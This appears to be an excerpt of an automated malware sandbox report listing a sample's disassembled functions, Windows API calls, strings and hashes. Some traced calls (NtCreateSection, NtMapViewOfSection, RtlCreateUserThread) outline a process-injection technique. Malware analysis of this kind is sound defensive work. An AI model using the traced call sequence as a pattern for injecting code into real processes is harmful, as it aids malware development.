
Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02B7FE2C Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02B7FE7D

Memory Dump Source

Source File: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b7d000_K80v6DHFHE.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 4329d4c01c2d71f75f2e619dfa01673e64e287d2975cfd3a19e02b704abd0065
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: AA113979A00208EFDB01DF98C985E99BBF5EF08350F0580A4F9489B362D371EA90DF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00415180 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B18CE4,00415848), ref: 00415188

Memory Dump Source

Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 697e3b3ef190b299ffb728806ee3e68314d7429f88aebd263d7b879482847904
Instruction ID: f865e6b2e3803cbb86dad00ce2678956489d20d1f66e016f0fea3cba8c339ba6
Opcode Fuzzy Hash: 697e3b3ef190b299ffb728806ee3e68314d7429f88aebd263d7b879482847904
Instruction Fuzzy Hash: 79B092B09822009BE2408FB0A844B513A65B308342F414821F60886280CA2164208F14

Non-executed Functions

Function 02C7092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02C70966
., xrefs: 02C7095F
GetProcAddress., xrefs: 02C709DC, 02C709DF, 02C709E4

Memory Dump Source

Source File: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c70000_K80v6DHFHE.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 9e1734403a4ada61a9505d76245ba2f0029b62354f8ae7908a5a5dfa82fbdc57
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: E03139B6910609DFDB10CF99C884AAEBBF9FF58324F15404AD841A7350D771EA45CFA4

Function 02B7FA4A Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b7d000_K80v6DHFHE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 130b24a85bfeabe303821a8c55d994a8b7875f57190af622a8dccb1956b77569
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 281182723402009FD744DF55DC80FA673EAEB89360B1980A5ED24CB761D775E801CB60

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 02C70D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c70000_K80v6DHFHE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 08bd649448e95a8ddea2dbac74536dd2175c56ddeb5a163a840c0bc8e94f64e1
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 6E01D676A106048FDF21CF64C905BAA33F5FBC6316F5544B5D90AD7281E774A941CB90

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Function 00415380 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 004153B1
WritePrivateProfileStringA.KERNEL32(00417378,00417354,0041732C,0041731C), ref: 004153D5
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004153DD
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 0041541D
GetComputerNameW.KERNEL32(?,?), ref: 00415431
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041543F
OpenJobObjectA.KERNEL32(00000000,00000000,004173A0), ref: 0041544E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041545F

Strings

-, xrefs: 0041546C

Memory Dump Source

Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: ad612eebba40d6e8f493addfd08894c0b8485d4a8875d0888b2cb3aa7251e0aa
Instruction ID: 204a2022625e4fb3e4702eb5f8edaa10a17d11f6e745e2405329eac1171ae186
Opcode Fuzzy Hash: ad612eebba40d6e8f493addfd08894c0b8485d4a8875d0888b2cb3aa7251e0aa
Instruction Fuzzy Hash: 95210831A44348EBE720DFA4DC85BD97B70EB4C752F1180AAFA49AA1C0CAF459C4CF59

Function 004154A0 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 004154D4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004154EF
HeapDestroy.KERNEL32(00000000), ref: 0041550E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415516

Memory Dump Source

Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: fa0f3e0493c3b50bce5c50c212db6b9832cbc5cdcb4cec3faed1b1786864bbd5
Instruction ID: fa24f5b182106e8a66cc9c052caed5fc4614bc77b159341e0b6937d28379f147
Opcode Fuzzy Hash: fa0f3e0493c3b50bce5c50c212db6b9832cbc5cdcb4cec3faed1b1786864bbd5
Instruction Fuzzy Hash: 4B01A770A41508EBE750EBB4ED45BDA7BB8B70C346F404037EA0597281DA745D90CB59

Analysis Process: wafguagPID: 6100, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	28.5%
Signature Coverage:	0%
Total number of Nodes:	172
Total number of Limit Nodes:	6

Executed Functions

Function 00415530 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 302
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415602
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041561B
FindAtomW.KERNEL32(00000000), ref: 00415622
SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041562A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415642
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415669
MoveFileW.KERNEL32(00000000,00000000), ref: 00415671
GetVersionExW.KERNEL32(?), ref: 0041567E
DisconnectNamedPipe.KERNEL32(?), ref: 00415691
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004156D6
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004156E5
LCMapStringA.KERNEL32(00000000,00000000,004173A8,00000000,?,00000000), ref: 004156FB
GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 0041570D
PulseEvent.KERNEL32(00000000), ref: 0041571D
SetCommState.KERNELBASE(00000000,00000000), ref: 00415744
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415775
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415786
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041578E
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173D8,?,00000000), ref: 004157CE
GetFileAttributesW.KERNEL32(00000000), ref: 004157D5
GetConsoleAliasExesLengthA.KERNEL32 ref: 004157DB
GetBinaryType.KERNEL32(004173E8,?), ref: 004157ED
GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004157F7
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041580A
LoadLibraryA.KERNELBASE(004173F4), ref: 00415892
InterlockedDecrement.KERNEL32(?), ref: 004158E0

Strings

k`, xrefs: 004158C3
}$, xrefs: 004158E7

Memory Dump Source

Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd

Similarity

API ID: Console$CommFile$FormatInterlockedLengthReadStringType$AliasAliasesAtomAttributesBinaryBoundsBuildCompareConfigDecrementDefaultDisconnectEventExchangeExesFindInfoLibraryLoadLocaleMessageModeModuleMoveNameNamedOutputPathPipePulseRectSearchStateTimeVersion
String ID: k`$}$
API String ID: 777263412-956986773
Opcode ID: 9a6d517027ea327947a6227254bff5a0b99b091f86ca634d153418c31ef3e2ee
Instruction ID: 28d08a9e12edc1d56af3eee545ba5f80b0898f125747bb2d66328808cc3604cb
Opcode Fuzzy Hash: 9a6d517027ea327947a6227254bff5a0b99b091f86ca634d153418c31ef3e2ee
Instruction Fuzzy Hash: A4B1D071802924EBD721EB61EC48ADB7F79FF89351F41406AF50AA7150DB384A81CFAD

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000005.00000002.2218870434.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wafguag.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02C8003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C8024D

Strings

cess, xrefs: 02C8018D
kernel32.dll, xrefs: 02C8008F, 02C80095

Memory Dump Source

Source File: 00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c80000_wafguag.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: acd8429db98b17632d335476261fc33c41f825b06f7640636538905718581767
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 62526B75A01229DFDB64CF58C984BACBBB1BF09308F1480D9E54DAB351DB30AA89DF15

Function 00415867 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(004173F4), ref: 00415892
InterlockedDecrement.KERNEL32(?), ref: 004158E0

Strings

k`, xrefs: 004158C3
}$, xrefs: 004158E7

Memory Dump Source

Source File: 00000005.00000002.2218892265.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wafguag.jbxd

Similarity

API ID: DecrementInterlockedLibraryLoad
String ID: k`$}$
API String ID: 1728580480-956986773
Opcode ID: a020aaf6d7ef5e2bfd4c9a9f54f779ecec6b35c3b295fac4a587e97a552db2d4
Instruction ID: 273e988762e02699ff252dc655ae774bf30313f900aa46e77cba19cfb1f4ca4e
Opcode Fuzzy Hash: a020aaf6d7ef5e2bfd4c9a9f54f779ecec6b35c3b295fac4a587e97a552db2d4
